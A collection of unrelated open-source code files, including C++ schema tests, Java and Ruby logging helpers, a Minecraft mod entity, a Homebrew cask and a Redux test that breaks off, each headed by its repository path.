#include "gtest/gtest.h"
#include "rapidjson/document.h"
#include "rapidjson/istreamwrapper.h"
#include "rapidjson/schema.h"
#include "rapidjson/stringbuffer.h"

namespace broker_service {
namespace {

// Schema file loaded once for the whole suite.
constexpr std::string_view kSchemaPath = "pkg/data/testdata/fake.schema.json";

// Document that conforms to the test schema.
constexpr std::string_view kValidSchema = R"(
    {
        "required_field": false,
        "optional_field": false
    }
)";

// Document that does NOT conform: note the trailing comma, which makes it
// invalid JSON/schema input on purpose.
constexpr std::string_view kInvalidSchema = R"(
    {
        "optional_field": false,
    }
)";

// Fixture that parses the schema file once (SetUpTestSuite) and shares the
// compiled rapidjson::SchemaDocument across all tests.
class JsonReaderTest : public ::testing::Test {
 public:
  static void SetUpTestSuite() {
    std::ifstream config_stream(kSchemaPath.data());
    ASSERT_TRUE(config_stream.good()) << strerror(errno);
    rapidjson::IStreamWrapper config_wrapper(config_stream);
    rapidjson::Document schema_doc;
    ASSERT_FALSE(schema_doc.ParseStream(config_wrapper).HasParseError());
    schema_doc_ = std::make_unique<rapidjson::SchemaDocument>(schema_doc);
  }

  static void TearDownTestSuite() { schema_doc_.reset(); }

  static rapidjson::SchemaDocument* GetSchema() { return schema_doc_.get(); }

 private:
  static std::unique_ptr<rapidjson::SchemaDocument> schema_doc_;
};

std::unique_ptr<rapidjson::SchemaDocument> JsonReaderTest::schema_doc_ = nullptr;

// A schema-conformant document validates cleanly and reports no errors.
TEST_F(JsonReaderTest, IsOkIsTrueForSchemaCompilantJson) {
  rapidjson::Document config;
  config.Parse(kValidSchema.data(), kValidSchema.size());
  JsonReader reader(std::move(config), GetSchema());

  ASSERT_TRUE(reader.Validate());
  ASSERT_TRUE(reader.IsOk());
  ASSERT_TRUE(reader.error_messages().empty());
}

// A non-conformant document fails validation and accumulates error messages.
TEST_F(JsonReaderTest, IsOkIsFalseForSchemaNonCompilantJson) {
  rapidjson::Document config;
  config.Parse(kInvalidSchema.data(), kInvalidSchema.size());
  JsonReader reader(std::move(config), GetSchema());

  ASSERT_FALSE(reader.Validate());
  ASSERT_FALSE(reader.IsOk());
  ASSERT_FALSE(reader.error_messages().empty());
}

}  // namespace
}  // namespace broker_service
matfurrier/BambooBSC
core-base/src/com/netsteadfast/greenstep/sys/SysEventLogSupport.java
/*
 * Copyright 2012-2016 bambooCORE, greenstep of copyright <NAME>
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *   http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 *
 * -----------------------------------------------------------------------
 *
 * author: 	<NAME>
 * contact: <EMAIL>
 *
 */
package com.netsteadfast.greenstep.sys;

import java.util.Date;
import java.util.HashMap;
import java.util.Map;

import org.apache.commons.lang3.StringUtils;
import org.apache.log4j.Logger;
import org.springframework.jdbc.core.namedparam.NamedParameterJdbcTemplate;

import com.netsteadfast.greenstep.base.AppContext;
import com.netsteadfast.greenstep.base.Constants;
import com.netsteadfast.greenstep.util.SimpleUtils;

/**
 * Writes audit rows into {@code tb_sys_event_log} recording which user
 * executed which event in which system, and whether it was permitted.
 */
public class SysEventLogSupport {
	protected static Logger log=Logger.getLogger(SysEventLogSupport.class);

	/**
	 * Inserts one event-log row. Best-effort: invalid input and common
	 * load-form events are skipped with a warning, and insert failures are
	 * logged but never propagated to the caller.
	 *
	 * @param userId         acting user; required
	 * @param sysId          system identifier; required
	 * @param executeEventId event identifier; required, truncated to 255 chars
	 * @param permit         whether the event was permitted (stored as Y/N)
	 */
	public static void log(String userId, String sysId, String executeEventId, boolean permit) {
		if ( StringUtils.isBlank(userId) || StringUtils.isBlank(sysId) || StringUtils.isBlank(executeEventId) ) {
			log.warn("null userId=" + userId + ", sysId=" + sysId + ", executeEventId=" + executeEventId);
			return;
		}
		// Common "load form" actions are too noisy to be worth auditing.
		if ( executeEventId.indexOf(Constants._COMMON_LOAD_FORM_ACTION) > -1 ) {
			log.warn("Common load form no need event log : " + executeEventId + " , permit = " + permit);
			return;
		}
		NamedParameterJdbcTemplate namedParameterJdbcTemplate =
				(NamedParameterJdbcTemplate)AppContext.getBean("namedParameterJdbcTemplate");
		Map<String, Object> paramMap = new HashMap<String, Object>();
		paramMap.put("oid", SimpleUtils.getUUIDStr());
		paramMap.put("user", userId);
		paramMap.put("sysId", sysId);
		// EXECUTE_EVENT column is VARCHAR(255) — truncate oversized ids.
		paramMap.put("executeEvent", ( executeEventId.length()>255 ? executeEventId.substring(0, 255) : executeEventId ) );
		paramMap.put("isPermit", ( permit ? "Y" : "N" ) );
		paramMap.put("cuserid", "SYS");
		paramMap.put("cdate", new Date());
		try {
			namedParameterJdbcTemplate.update("insert into tb_sys_event_log(OID, USER, SYS_ID, EXECUTE_EVENT, IS_PERMIT, CUSERID, CDATE) "
					+ "values(:oid, :user, :sysId, :executeEvent, :isPermit, :cuserid, :cdate)", paramMap);
		} catch (Exception e) {
			// Fixed: previously called e.printStackTrace() and
			// log.error(e.getMessage().toString()), which lost the stack trace
			// and threw NPE when getMessage() returned null. Log the full
			// throwable instead; event logging must never break the caller.
			log.error("insert tb_sys_event_log failed.", e);
		}
	}
}
klueless-io/k_dsl
_/.template/x-r6-app-core-bak/new-rails-32-l-helper.rb
# Log Helper is an internal class that takes care of a lot of the formatting of
# different content types, e.g. key/values, lines, progress counters and
# headings. It is different to the formatter because the formatter is used by
# Rails Logger to change the output stream style and format.
class LogHelper
  @progress_section = ''
  @progress_position = 0

  class << self
    attr_accessor :progress_position
    attr_accessor :progress_section
  end

  # Left-pad a key (in green) against its value: "key          : value"
  def self.kv(key, value, key_width = 30)
    key.ljust(key_width).green + ': ' + value.to_s
  end

  # Render and advance a progress counter such as "..  section :   12".
  # pos/section update the stored state only when given; the position
  # auto-increments on every call.
  def self.progress(pos = nil, section = nil)
    # Fixed: the old branch assigned @progress_position to itself when pos
    # was blank — keep the state update only for a real position.
    @progress_position = pos unless pos.blank?
    @progress_section = section unless section.nil?

    section_length = 28
    label =
      if @progress_section.blank?
        ' ' * section_length
      else
        ' ' + @progress_section.ljust(section_length - 1, ' ')
      end

    result = '..' + label + ':' + @progress_position.to_s.rjust(4)
    @progress_position += 1
    result
  end

  # A green horizontal rule.
  def self.line(size = 70, character = '=')
    (character * size).green
  end

  # Heading sandwiched between '=' rules.
  def self.heading(heading, size = 70)
    divider = line(size)
    [divider, heading, divider]
  end

  # Heading sandwiched between '-' rules.
  def self.subheading(heading, size = 70)
    divider = line(size, '-')
    [divider, heading, divider]
  end

  # A section heading
  #
  # example:
  # [ I am a heading ]----------------------------------------------------
  def self.section_heading(heading, size = 70)
    heading = "[ #{heading} ]"
    divider = line(size - heading.length, '-')
    # It is important that the colour is applied AFTER the length calculation,
    # otherwise the ANSI escape codes would inflate heading.length.
    "#{heading.green}#{divider}"
  end

  # :sql_array should be an array with SQL and values
  # example: L.sql(["name = :name and group_id = :value OR parent_id = :value", name: "foo'bar", value: 4])
  #
  # NOTE(review): this is the only instance method in an otherwise
  # class-method helper — presumably it was meant to be `self.sql`; confirm
  # call sites before moving it, as that would change the public interface.
  def sql(sql_array)
    value = ActiveRecord::Base.send(:sanitize_sql_array, sql_array)
    info(value)
  end

  # Build a multi-line "block" of output: optional surrounding rules, optional
  # title with a ',' rule, then the message(s) — a String/Integer is pushed
  # as-is, an Array is flattened in element by element.
  def self.block(messages, include_line = true, title: nil)
    result = include_line ? [line] : []

    if title.present?
      result.push(title)
      result.push(line(70, ','))
    end

    if messages.is_a?(String) || messages.is_a?(Integer)
      result.push(messages)
    end

    if messages.is_a?(Array)
      messages.each { |message| result.push(message) }
    end

    result.push(line) if include_line
    result
  end
end
horta-tech/hera_cms
db/migrate/20201202150007_create_hera_cms_links.rb
# Creates the hera_cms_links table: editable link records identified by a
# unique-per-page +identifier+, carrying the target +path+, display text and
# optional CSS classes / inline style (all defaulting to empty strings).
class CreateHeraCmsLinks < ActiveRecord::Migration[6.0]
  def change
    create_table :hera_cms_links do |t|
      t.string :identifier                 # key used by the CMS to locate this link
      t.string :path                       # href target
      t.string :inner_text, default: ""    # visible link text
      t.string :classes, default: ""       # CSS classes applied to the tag
      t.string :style, default: ""         # inline style applied to the tag

      t.timestamps
    end
  end
end
kmsiapps/maplestory_dpm_calc
dpmModule/character/characterTemplate.py
from .characterKernel import ItemedCharacter as ichar
from .characterKernel import LinkSkill
from ..item import Arcane, Absolab, Empress, RootAbyss, BossAccesory, Default, Else, Meister, Darkness
from ..item.ItemKernel import CharacterModifier as MDF
from ..item import ItemKernel as it

# Registry mapping a generator name to its AbstractTemplateGenerator subclass.
_STORAGE_FOR_EXISTING_TEMPLATE_DEFINED_BY_ABSTRACT_TEMPLATE_GENERATOR = {}


def register_template_generator(generator_class, generator_name):
    """Register ``generator_class`` in the module registry under ``generator_name``.

    Re-registering the same name silently overwrites the previous entry.
    """
    # `global` is unnecessary here: we mutate the dict, we never rebind the name.
    _STORAGE_FOR_EXISTING_TEMPLATE_DEFINED_BY_ABSTRACT_TEMPLATE_GENERATOR[generator_name] = generator_class


def get_template_generator(generator_name):
    """Return the generator class registered under ``generator_name``.

    Raises:
        KeyError: if no generator was registered under that name.
    """
    try:
        return _STORAGE_FOR_EXISTING_TEMPLATE_DEFINED_BY_ABSTRACT_TEMPLATE_GENERATOR[generator_name]
    except KeyError as exc:
        # Narrowed from a bare `except:` (which also swallowed e.g.
        # KeyboardInterrupt); chain the original lookup failure for context.
        raise KeyError(f'Given generator {generator_name} not exist or not had been registered.') from exc


class AbstractTemplateGenerator():
    """Base class for template generators keyed by union level (ulevel).

    ``weaponstat_config`` maps ulevel -> recommended weapon-stat config;
    subclasses implement :meth:`get_template`.
    """

    def __init__(self, weaponstat_config):
        self.WEAPONSTAT_CONFIG_RECOMMENDED = weaponstat_config

    def __iter__(self):
        """Yield (ulevel, template, weaponstat) for every configured ulevel."""
        for ulevel in self.get_ulevels():
            yield ulevel, self.get_template(ulevel), self.WEAPONSTAT_CONFIG_RECOMMENDED[ulevel]

    def get_ulevels(self):
        """Return the configured ulevels in ascending order."""
        return sorted(self.WEAPONSTAT_CONFIG_RECOMMENDED.keys())

    def get_weaponstat(self, ulevel):
        """Return the recommended weapon-stat config for ``ulevel``."""
        return self.WEAPONSTAT_CONFIG_RECOMMENDED[ulevel]

    def query(self, ulevel):
        """Return the (template, weaponstat) pair for ``ulevel``."""
        return self.get_template(ulevel), self.get_weaponstat(ulevel)

    def get_template(self, ulevel):
        """Build the character template for ``ulevel``; must be overridden."""
        raise NotImplementedError
Killarexe/Negative-N-Forge-Version
src/main/java/net/killarexe/negativen/entity/SlimeNEntity.java
package net.killarexe.negativen.entity;

import net.minecraftforge.registries.ForgeRegistries;
import net.minecraftforge.fml.network.NetworkHooks;
import net.minecraftforge.fml.network.FMLPlayMessages;
import net.minecraftforge.fml.javafmlmod.FMLJavaModLoadingContext;
import net.minecraftforge.fml.event.lifecycle.FMLCommonSetupEvent;
import net.minecraftforge.fml.client.registry.RenderingRegistry;
import net.minecraftforge.fml.DeferredWorkQueue;
import net.minecraftforge.eventbus.api.SubscribeEvent;
import net.minecraftforge.event.world.BiomeLoadingEvent;
import net.minecraftforge.common.MinecraftForge;
import net.minecraftforge.client.event.ModelRegistryEvent;
import net.minecraftforge.api.distmarker.OnlyIn;
import net.minecraftforge.api.distmarker.Dist;
import net.minecraft.world.gen.Heightmap;
import net.minecraft.world.biome.MobSpawnInfo;
import net.minecraft.world.World;
import net.minecraft.util.math.BlockPos;
import net.minecraft.util.ResourceLocation;
import net.minecraft.util.DamageSource;
import net.minecraft.network.IPacket;
import net.minecraft.item.SpawnEggItem;
import net.minecraft.item.ItemStack;
import net.minecraft.item.Item;
import net.minecraft.entity.monster.MonsterEntity;
import net.minecraft.entity.ai.goal.SwimGoal;
import net.minecraft.entity.ai.goal.RandomWalkingGoal;
import net.minecraft.entity.ai.goal.MeleeAttackGoal;
import net.minecraft.entity.ai.goal.LookRandomlyGoal;
import net.minecraft.entity.ai.goal.HurtByTargetGoal;
import net.minecraft.entity.ai.attributes.GlobalEntityTypeAttributes;
import net.minecraft.entity.ai.attributes.Attributes;
import net.minecraft.entity.ai.attributes.AttributeModifierMap;
import net.minecraft.entity.MobEntity;
import net.minecraft.entity.EntityType;
import net.minecraft.entity.EntitySpawnPlacementRegistry;
import net.minecraft.entity.EntityClassification;
import net.minecraft.entity.Entity;
import net.minecraft.entity.CreatureAttribute;
import net.minecraft.client.renderer.model.ModelRenderer;
import net.minecraft.client.renderer.entity.model.EntityModel;
import net.minecraft.client.renderer.entity.MobRenderer;
import net.minecraft.block.BlockState;
import net.killarexe.negativen.itemgroup.NegativeNMobsItemGroup;
import net.killarexe.negativen.item.SlimeBallNItem;
import net.killarexe.negativen.NegativeNModElements;
import com.mojang.blaze3d.vertex.IVertexBuilder;
import com.mojang.blaze3d.matrix.MatrixStack;

/**
 * Mod element for the "slime_n" monster: registers the entity type and its
 * spawn egg, adds its spawn to the negative_n:desert_n biome, wires up the
 * client renderer/model and the entity attributes.
 *
 * NOTE(review): this class follows the MCreator-generated ModElement pattern
 * (registration via the mod's `elements` lists and Forge event buses) —
 * structural changes should be made in the generator, not by hand.
 */
@NegativeNModElements.ModElement.Tag
public class SlimeNEntity extends NegativeNModElements.ModElement {
	// Raw EntityType shared by registration, spawning and rendering code.
	public static EntityType entity = null;

	public SlimeNEntity(NegativeNModElements instance) {
		super(instance, 61);
		FMLJavaModLoadingContext.get().getModEventBus().register(new ModelRegisterHandler());
		MinecraftForge.EVENT_BUS.register(this);
	}

	/** Builds and queues the entity type and its spawn-egg item for registry. */
	@Override
	public void initElements() {
		entity = (EntityType.Builder.<CustomEntity>create(CustomEntity::new, EntityClassification.MONSTER).setShouldReceiveVelocityUpdates(true)
				.setTrackingRange(64).setUpdateInterval(3).setCustomClientFactory(CustomEntity::new).immuneToFire().size(1f, 1f)).build("slime_n")
						.setRegistryName("slime_n");
		elements.entities.add(() -> entity);
		elements.items.add(
				() -> new SpawnEggItem(entity, -1, -1, new Item.Properties().group(NegativeNMobsItemGroup.tab)).setRegistryName("slime_n_spawn_egg"));
	}

	/** Adds monster spawns (weight 10, group size 1) only in negative_n:desert_n. */
	@SubscribeEvent
	public void addFeatureToBiomes(BiomeLoadingEvent event) {
		boolean biomeCriteria = false;
		if (new ResourceLocation("negative_n:desert_n").equals(event.getName()))
			biomeCriteria = true;
		if (!biomeCriteria)
			return;
		event.getSpawns().getSpawner(EntityClassification.MONSTER).add(new MobSpawnInfo.Spawners(entity, 10, 1, 1));
	}

	/** Common setup: defer attribute registration and register spawn placement rules. */
	@Override
	public void init(FMLCommonSetupEvent event) {
		DeferredWorkQueue.runLater(this::setupAttributes);
		EntitySpawnPlacementRegistry.register(entity, EntitySpawnPlacementRegistry.PlacementType.ON_GROUND,
				Heightmap.Type.MOTION_BLOCKING_NO_LEAVES, MonsterEntity::canMonsterSpawn);
	}

	/** Client-only: binds the Modelslime_n renderer and texture to the entity type. */
	private static class ModelRegisterHandler {
		@SubscribeEvent
		@OnlyIn(Dist.CLIENT)
		public void registerModels(ModelRegistryEvent event) {
			RenderingRegistry.registerEntityRenderingHandler(entity, renderManager -> {
				return new MobRenderer(renderManager, new Modelslime_n(), 0.5f) {
					@Override
					public ResourceLocation getEntityTexture(Entity entity) {
						return new ResourceLocation("negative_n:textures/slime_n.png");
					}
				};
			});
		}
	}

	/** Registers base attributes: 0.3 speed, 15 HP, 0 armor, 5 attack damage. */
	private void setupAttributes() {
		AttributeModifierMap.MutableAttribute ammma = MobEntity.func_233666_p_();
		ammma = ammma.createMutableAttribute(Attributes.MOVEMENT_SPEED, 0.3);
		ammma = ammma.createMutableAttribute(Attributes.MAX_HEALTH, 15);
		ammma = ammma.createMutableAttribute(Attributes.ARMOR, 0);
		ammma = ammma.createMutableAttribute(Attributes.ATTACK_DAMAGE, 5);
		GlobalEntityTypeAttributes.put(entity, ammma.create());
	}

	/** The slime_n mob itself: melee monster using vanilla slime sounds. */
	public static class CustomEntity extends MonsterEntity {
		public CustomEntity(FMLPlayMessages.SpawnEntity packet, World world) {
			this(entity, world);
		}

		public CustomEntity(EntityType<CustomEntity> type, World world) {
			super(type, world);
			experienceValue = 0;
			setNoAI(false);
		}

		@Override
		public IPacket<?> createSpawnPacket() {
			return NetworkHooks.getEntitySpawningPacket(this);
		}

		/** AI: melee attack, wander, retaliate, look around, swim. */
		@Override
		protected void registerGoals() {
			super.registerGoals();
			this.goalSelector.addGoal(1, new MeleeAttackGoal(this, 1.2, false));
			this.goalSelector.addGoal(2, new RandomWalkingGoal(this, 1));
			this.targetSelector.addGoal(3, new HurtByTargetGoal(this));
			this.goalSelector.addGoal(4, new LookRandomlyGoal(this));
			this.goalSelector.addGoal(5, new SwimGoal(this));
		}

		@Override
		public CreatureAttribute getCreatureAttribute() {
			return CreatureAttribute.UNDEFINED;
		}

		/** Always drops exactly one negative slime ball in addition to super's drops. */
		protected void dropSpecialItems(DamageSource source, int looting, boolean recentlyHitIn) {
			super.dropSpecialItems(source, looting, recentlyHitIn);
			this.entityDropItem(new ItemStack(SlimeBallNItem.block, (int) (1)));
		}

		@Override
		public void playStepSound(BlockPos pos, BlockState blockIn) {
			this.playSound((net.minecraft.util.SoundEvent) ForgeRegistries.SOUND_EVENTS.getValue(new ResourceLocation("entity.slime.jump")), 0.15f, 1);
		}

		@Override
		public net.minecraft.util.SoundEvent getHurtSound(DamageSource ds) {
			return (net.minecraft.util.SoundEvent) ForgeRegistries.SOUND_EVENTS.getValue(new ResourceLocation("entity.slime.hurt"));
		}

		@Override
		public net.minecraft.util.SoundEvent getDeathSound() {
			return (net.minecraft.util.SoundEvent) ForgeRegistries.SOUND_EVENTS.getValue(new ResourceLocation("entity.slime.death"));
		}
	}

	// Made with Blockbench 3.7.4
	// Exported for Minecraft version 1.15
	// Paste this class into your mod and generate all required imports
	/** Blockbench-exported model: outer cube, two eyes, mouth, inner cube. */
	public static class Modelslime_n extends EntityModel<Entity> {
		private final ModelRenderer cube;
		private final ModelRenderer eye0;
		private final ModelRenderer eye1;
		private final ModelRenderer mouth;
		private final ModelRenderer cube2;

		public Modelslime_n() {
			textureWidth = 64;
			textureHeight = 32;
			cube = new ModelRenderer(this);
			cube.setRotationPoint(0.0F, 0.0F, 0.0F);
			cube.setTextureOffset(0, 0).addBox(-4.0F, 16.0F, -4.0F, 8.0F, 8.0F, 8.0F, 0.0F, true);
			eye0 = new ModelRenderer(this);
			eye0.setRotationPoint(0.0F, 0.0F, 0.0F);
			eye0.setTextureOffset(32, 0).addBox(1.3F, 18.0F, -3.5F, 2.0F, 2.0F, 2.0F, 0.0F, true);
			eye1 = new ModelRenderer(this);
			eye1.setRotationPoint(0.0F, 0.0F, 0.0F);
			eye1.setTextureOffset(32, 4).addBox(-3.3F, 18.0F, -3.5F, 2.0F, 2.0F, 2.0F, 0.0F, true);
			mouth = new ModelRenderer(this);
			mouth.setRotationPoint(0.0F, 0.0F, 0.0F);
			mouth.setTextureOffset(32, 8).addBox(-1.0F, 21.0F, -3.5F, 1.0F, 1.0F, 1.0F, 0.0F, true);
			cube2 = new ModelRenderer(this);
			cube2.setRotationPoint(0.0F, 0.0F, 0.0F);
			cube2.setTextureOffset(0, 16).addBox(-3.0F, 17.0F, -3.0F, 6.0F, 6.0F, 6.0F, 0.0F, true);
		}

		@Override
		public void render(MatrixStack matrixStack, IVertexBuilder buffer, int packedLight, int packedOverlay, float red, float green, float blue,
				float alpha) {
			cube.render(matrixStack, buffer, packedLight, packedOverlay);
			eye0.render(matrixStack, buffer, packedLight, packedOverlay);
			eye1.render(matrixStack, buffer, packedLight, packedOverlay);
			mouth.render(matrixStack, buffer, packedLight, packedOverlay);
			cube2.render(matrixStack, buffer, packedLight, packedOverlay);
		}

		public void setRotationAngle(ModelRenderer modelRenderer, float x, float y, float z) {
			modelRenderer.rotateAngleX = x;
			modelRenderer.rotateAngleY = y;
			modelRenderer.rotateAngleZ = z;
		}

		// Static model: no per-tick animation.
		public void setRotationAngles(Entity e, float f, float f1, float f2, float f3, float f4) {
		}
	}
}
jorgedc93/backpack
packages/bpk-svgs/dist/js/icons/sm/thumbs-down.js
// Generated small (sm) "thumbs-down" icon for Backpack: an 18x18 (1.125rem)
// inline SVG; any extra props are spread onto the <svg> root element.
// NOTE(review): `styles` is destructured but never used — presumably kept so
// it is stripped from the props spread for API parity with other generated
// icons; confirm against the icon generator before removing.
import React from "react";
export default (({ styles = {}, ...props }) => <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="18" height="18" style={{ width: "1.125rem", height: "1.125rem" }} {...props}><path d="M15.75 4v8.104a2.083 2.083 0 0 1-.144.762l-3.087 7.837a.458.458 0 0 1-.423.297 2.846 2.846 0 0 1-2.665-3.57l.284-1.188A.991.991 0 0 0 8.787 15H4.164a1.99 1.99 0 0 1-1.79-2.702l2.17-6.054A4.798 4.798 0 0 1 9.023 3h5.772a.979.979 0 0 1 .956 1zm2.55-1a1.05 1.05 0 0 0-1.05 1.05v6.9A1.05 1.05 0 0 0 18.3 12h2.4a1.05 1.05 0 0 0 1.05-1.05v-6.9A1.05 1.05 0 0 0 20.7 3z" /></svg>);
ljmf00/autopsy
ImageGallery/src/org/sleuthkit/autopsy/imagegallery/actions/RedoAction.java
/*
 * Autopsy Forensic Browser
 *
 * Copyright 2015 Basis Technology Corp.
 * Contact: carrier <at> sleuthkit <dot> org
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */
package org.sleuthkit.autopsy.imagegallery.actions;

import javafx.scene.image.Image;
import javafx.scene.image.ImageView;
import javafx.scene.input.KeyCode;
import javafx.scene.input.KeyCodeCombination;
import org.controlsfx.control.action.Action;
import org.openide.util.NbBundle;
import org.sleuthkit.autopsy.imagegallery.ImageGalleryController;

/**
 * Action that redoes the last undone command
 */
@NbBundle.Messages({"RedoAction.name=Redo"})
public class RedoAction extends Action {

    // Icon loaded once and shared by all RedoAction instances.
    private static final Image REDO_IMAGE = new Image("/org/sleuthkit/autopsy/imagegallery/images/redo.png", 16, 16, true, true, true); //NON-NLS

    /**
     * Wires the action to the controller's UndoManager: Ctrl+Y accelerator,
     * redo on invocation, and auto-disable while no redos are available
     * (disabled state is bound to the redos-available property).
     *
     * @param controller gallery controller owning the UndoManager
     */
    public RedoAction(ImageGalleryController controller) {
        super(Bundle.RedoAction_name());
        setGraphic(new ImageView(REDO_IMAGE));
        setAccelerator(new KeyCodeCombination(KeyCode.Y, KeyCodeCombination.CONTROL_DOWN));
        setEventHandler(actionEvent -> controller.getUndoManager().redo());
        disabledProperty().bind(controller.getUndoManager().redosAvailableProporty().lessThanOrEqualTo(0));
    }
}
JiangJibo/pinpoint
web/src/main/java/com/navercorp/pinpoint/web/dao/mysql/MysqlWebhookDao.java
package com.navercorp.pinpoint.web.dao.mysql;

import com.navercorp.pinpoint.web.dao.WebhookDao;
import com.navercorp.pinpoint.web.vo.Webhook;
import org.mybatis.spring.SqlSessionTemplate;
import org.springframework.beans.factory.annotation.Qualifier;
import org.springframework.stereotype.Repository;

import java.util.List;
import java.util.Objects;

/**
 * MyBatis-backed MySQL implementation of {@link WebhookDao}.
 *
 * <p>All statement ids are resolved relative to the {@code WebhookDao}
 * interface name so they match the mapper XML namespace.
 */
@Repository
public class MysqlWebhookDao implements WebhookDao {

    /** Mapper namespace prefix for every statement id below. */
    private static final String NAMESPACE = WebhookDao.class.getName() + ".";

    private final SqlSessionTemplate sqlSessionTemplate;

    public MysqlWebhookDao(@Qualifier("sqlSessionTemplate") SqlSessionTemplate sqlSessionTemplate) {
        this.sqlSessionTemplate = Objects.requireNonNull(sqlSessionTemplate, "sqlSessionTemplate");
    }

    /**
     * Inserts the webhook and returns its id.
     *
     * @param webhook webhook to persist
     * @return the webhook's id (as set on the passed-in object)
     */
    @Override
    public String insertWebhook(Webhook webhook) {
        sqlSessionTemplate.insert(NAMESPACE + "insertWebhook", webhook);
        return webhook.getWebhookId();
    }

    /** Deletes the given webhook. */
    @Override
    public void deleteWebhook(Webhook webhook) {
        // FIX: was sqlSessionTemplate.insert(...) for a DELETE statement.
        // MyBatis would still execute it, but delete() is the correct API and
        // returns/accounts for the affected-row semantics of a DELETE.
        sqlSessionTemplate.delete(NAMESPACE + "deleteWebhook", webhook);
    }

    /** Updates the given webhook in place. */
    @Override
    public void updateWebhook(Webhook webhook) {
        sqlSessionTemplate.update(NAMESPACE + "updateWebhook", webhook);
    }

    /** Deletes every webhook belonging to the given application. */
    @Override
    public void deleteWebhookByApplicationId(String applicationId) {
        // FIX: was insert(); see deleteWebhook above.
        sqlSessionTemplate.delete(NAMESPACE + "deleteWebhookByApplicationId", applicationId);
    }

    /** Deletes every webhook belonging to the given service. */
    @Override
    public void deleteWebhookByServiceName(String serviceName) {
        // FIX: was insert(); see deleteWebhook above.
        sqlSessionTemplate.delete(NAMESPACE + "deleteWebhookByServiceName", serviceName);
    }

    /** @return all webhooks registered for the application (possibly empty). */
    @Override
    public List<Webhook> selectWebhookByApplicationId(String applicationId) {
        return sqlSessionTemplate.selectList(NAMESPACE + "selectWebhookByApplicationId", applicationId);
    }

    /** @return all webhooks registered for the service (possibly empty). */
    @Override
    public List<Webhook> selectWebhookByServiceName(String serviceName) {
        return sqlSessionTemplate.selectList(NAMESPACE + "selectWebhookByServiceName", serviceName);
    }

    /** @return all webhooks attached to the given alarm rule (possibly empty). */
    @Override
    public List<Webhook> selectWebhookByRuleId(String ruleId) {
        return sqlSessionTemplate.selectList(NAMESPACE + "selectWebhookByRuleId", ruleId);
    }

    /** @return the webhook with the given id, or {@code null} if absent. */
    @Override
    public Webhook selectWebhook(String webhookId) {
        return sqlSessionTemplate.selectOne(NAMESPACE + "selectWebhook", webhookId);
    }
}
benja-M-1/homebrew-cask
Casks/dusty.rb
cask "dusty" do
  version "0.7.5"
  sha256 "9e6cb17530053ffa7ba75bd4fd2b5840dc6508bd1d70166f3e6179ed30f5f721"

  url "https://github.com/gamechanger/dusty/releases/download/#{version}/dusty.tar.gz"
  appcast "https://github.com/gamechanger/dusty/releases.atom"
  name "Dusty"
  homepage "https://github.com/gamechanger/dusty"

  depends_on cask: "docker-toolbox"
  container type: :tar

  # The bundled install script requires root to set up the dusty daemon.
  installer script: {
    executable: "brew-install.sh",
    args:       [staged_path],
    sudo:       true,
  }
  binary "dusty"

  uninstall launchctl: "com.gamechanger.dusty"

  zap trash: "/etc/dusty"
end
gcharest/blip
test/unit/redux/actions/async.test.js
<reponame>gcharest/blip /* global chai */ /* global sinon */ /* global describe */ /* global it */ /* global expect */ /* global beforeEach */ /* global before */ /* global afterEach */ /* global after */ /* global context */ import configureStore from 'redux-mock-store'; import thunk from 'redux-thunk'; import trackingMiddleware from '../../../../app/redux/utils/trackingMiddleware'; import _ from 'lodash'; import isTSA from 'tidepool-standard-action'; import initialState from '../../../../app/redux/reducers/initialState'; import * as ErrorMessages from '../../../../app/redux/constants/errorMessages'; import * as UserMessages from '../../../../app/redux/constants/usrMessages'; import { TIDEPOOL_DATA_DONATION_ACCOUNT_EMAIL, MMOLL_UNITS } from '../../../../app/core/constants'; // need to require() async in order to rewire utils inside const async = require('../../../../app/redux/actions/async'); describe('Actions', () => { const trackMetric = sinon.spy(); const mockStore = configureStore([ thunk, trackingMiddleware({ metrics: { track: trackMetric } }) ]); afterEach(function() { // very important to do this in an afterEach than in each test when __Rewire__ is used // if you try to reset within each test you'll make it impossible for tests to fail! 
async.__ResetDependency__('utils'); trackMetric.resetHistory(); }) describe('Asynchronous Actions', () => { describe('signup', () => { it('should trigger SIGNUP_SUCCESS and it should call signup and get once for a successful request', () => { let user = { id: 27 }; let api = { user: { signup: sinon.stub().callsArgWith(1, null, user), } }; let expectedActions = [ { type: 'SIGNUP_REQUEST' }, { type: 'SIGNUP_SUCCESS', payload: { user: { id: 27 } } }, { type: '@@router/CALL_HISTORY_METHOD', payload: { args: [ '/email-verification' ], method: 'push' } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.signup(api, {foo: 'bar'})); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(trackMetric.calledWith('Signed Up')).to.be.true; }); it('should trigger ACCEPT_TERMS_REQUEST if the user user accepted terms in the signup form', () => { const acceptedDate = new Date().toISOString(); const loggedInUserId = false; const termsData = { termsAccepted: acceptedDate }; const user = { id: 27, }; const initialStateForTest = _.merge({}, initialState, { blip: { loggedInUserId } }); const api = { user: { signup: sinon.stub().callsArgWith(1, null, user), acceptTerms: sinon.stub().callsArgWith(1, null, user), } }; const accountDetails = { termsAccepted: acceptedDate, } const store = mockStore(initialStateForTest); store.dispatch(async.signup(api, accountDetails)); const actions = store.getActions(); const action = _.find(actions, { type: 'ACCEPT_TERMS_REQUEST' }); expect(isTSA(action)).to.be.true; }); it('[409] should trigger SIGNUP_FAILURE and it should call signup once and get zero times for a failed signup request', () => { let user = { id: 27 }; let api = { user: { signup: sinon.stub().callsArgWith(1, {status: 409, body: 'Error!'}, null), } }; let err = new 